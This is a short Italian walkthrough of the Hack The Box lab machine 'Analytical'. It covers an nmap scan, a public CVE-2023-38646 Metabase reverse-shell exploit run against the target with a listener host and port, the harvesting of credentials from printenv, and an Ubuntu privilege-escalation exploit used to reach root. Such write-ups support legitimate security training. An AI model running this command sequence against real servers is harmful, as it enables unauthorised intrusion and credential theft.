Analytics
Autore: Lord Shiva • Aggiornamento: 02.12.2023 • Tempo di lettura: 08 min.Come sempre il primo passo è quello di analizzare le porte aperte facendo una scansione con nmap:
nmap analytical.htb
e questo è il risultato:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-02 08:41 CET
Nmap scan report for analytical.htb (10.10.11.233)
Host is up (0.063s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Analytical
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds
Nel sito c\'è un\'area login interessante.
Navigando su internet in cerca di vulnerabilità, ho trovato questo exploit di seguito che potrebbe fare al caso nostro.
Mi scarico il programma CVE-2023-38646-Reverse-Shell.py e lo eseguo
sudo python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.14.6 --lport 1234
A questo punto sono dentro alla machcina, provo a lanciare il comando printenv e mi restituisce il seguente output:
printenv
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=14c5e9c28b25
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=******************
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=4
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/bin/printenv
Password utente trovata.... e anche la flag: 18b..........................67a
Adesso proviamo a fare un\'escalation dei privilegi.
Provo a vedere se ha qualche comando sudo, ma niente.
Facendo un semplice uname -a verifico la release del sistema operativo e... Poi ho trovato il repository Github contenente l\'exploit CVE-2023–2640-CVE-2023–32629. Utilizzando questo exploit ottengo l\'accesso root. Sìì!!
6b6.........................92a